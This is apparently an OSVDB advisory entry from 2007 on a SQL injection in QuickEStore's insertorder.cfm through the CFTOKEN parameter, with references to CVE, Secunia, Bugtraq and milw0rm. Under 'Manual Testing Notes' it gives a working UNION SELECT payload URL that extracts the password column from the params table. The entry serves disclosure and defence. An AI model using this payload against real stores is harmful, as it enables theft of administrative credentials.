QuickEStore insertorder.cfm CFTOKEN Variable SQL Injection

2007-07-18T17:07:11
ID OSVDB:36358
Type osvdb
Reporter meoconx(meoconx[at]vnbrain.net)
Modified 2007-07-18T17:07:11

Description

Manual Testing Notes

http://[target]/insertorder.cfm?CFID=123&CFTOKEN=1 union select 1,2,3,password,5,6,7,8,9,10,11,12 from params"having 1=1

References:

Secunia Advisory ID:26097 Other Advisory URL: http://milw0rm.com/exploits/4193 ISS X-Force ID: 35463 CVE-2007-3933 Bugtraq ID: 24961